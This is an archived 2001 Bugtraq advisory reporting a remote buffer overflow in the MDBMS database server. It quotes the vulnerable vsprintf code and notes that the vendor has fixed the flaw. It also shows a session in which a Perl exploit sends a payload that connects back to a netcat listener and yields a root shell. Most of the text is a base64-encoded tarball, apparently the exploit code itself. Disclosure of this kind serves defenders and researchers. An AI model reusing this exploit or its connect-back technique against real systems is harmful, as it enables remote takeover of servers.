[21003] in bugtraq
Remote buffer overflow in MDBMS.
daemon@ATHENA.MIT.EDU (teleh0r -)
Wed Jun 13 18:00:55 2001
Content-Type: Multipart/Mixed;
charset="iso-8859-1";
boundary="------------Boundary-00=_DN1URJWRG9OI45PPBD5P"
From: teleh0r - <teleh0r@digit-labs.org>
To: BUGTRAQ@securityfocus.com
Date: Tue, 12 Jun 2001 21:47:37 +0200
MIME-Version: 1.0
Message-Id: <01061221473700.15610@localhost.localdomain>
--------------Boundary-00=_DN1URJWRG9OI45PPBD5P
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Dear bugtraq readers,
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
Below is faulty code (from interface.cc):
void user::uprintf(char *s, ...)
{
char b[10000];
int len=strlen(outbuf), newlen;
va_list ap;
va_start(ap,s);
vsprintf(b,s,ap); <----
va_end(ap);
newlen=strlen(b);
while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
strcat(outbuf,b);
FD_SET(fd,&parent->wmask);
}
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
We would like to thank Marty for kind response and quick update.
Exploit example:
----------------
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
-t <hostname> : hostname to test
-b <back> : connect back to ip
-p <port> : port (default: 2223)
-d <delay> : delay before timeout
-o <offset> : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...
-> * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached.
Sincerely yours,
teleh0r and mu-b
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
--------------Boundary-00=_DN1URJWRG9OI45PPBD5P
Content-Type: application/x-gzip;
charset="iso-8859-1";
name="mdbms.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="mdbms.tar.gz"
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
heKZ+ANfMPPBAHgAAA==
--------------Boundary-00=_DN1URJWRG9OI45PPBD5P--
